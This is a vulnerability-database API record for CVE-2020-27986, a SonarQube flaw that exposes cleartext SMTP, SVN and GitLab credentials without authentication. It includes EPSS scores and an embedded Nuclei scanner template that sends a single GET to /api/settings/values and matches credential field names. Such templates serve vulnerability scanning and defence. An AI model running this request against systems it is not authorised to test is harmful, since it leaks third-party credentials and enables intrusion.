{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-27986/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-27986/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-27986/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-27986/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-27986/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-27986"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-27986"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.15966,
      "kev": false,
      "percentile": 0.96751
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2020/CVE-2020-27986.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2020-27986\n\ninfo:\n  name: SonarQube - Authentication Bypass\n  author: pikpikcu\n  severity: high\n  description: |\n    SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,\n    SVN, and GitLab credentials via the api/settings/values URI.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to sensitive information.\n  remediation: Reportedly, the vendor's position for SMTP and SVN is \"it is the administrator's responsibility to configure it.\"\n  reference:\n    - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-27866\n    - https://github.com/SexyBeast233/SecBooks\n    - https://github.com/SouthWind0/southwind0.github.io\n    - https://github.com/Z0fhack/Goby_POC\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2020-27986\n    cwe-id: CWE-306\n    epss-score: 0.15966\n    epss-percentile: 0.96751\n    cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: sonarsource\n    product: sonarqube\n  tags: cve,cve2020,sonarqube,sonarsource,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/settings/values\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - email.smtp_host.secured\n          - email.smtp_password.secured\n          - email.smtp_port.secured\n          - email.smtp_username.secured\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402204bed52625550586cac746a313bf3bd4196101d483cb1a33f84f40cbbc4c991a6022016c88a8e70a3b1c70775b1da1dc630b63629c8ff3fd12cbecce65ca76a71c068:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2020-27986"
}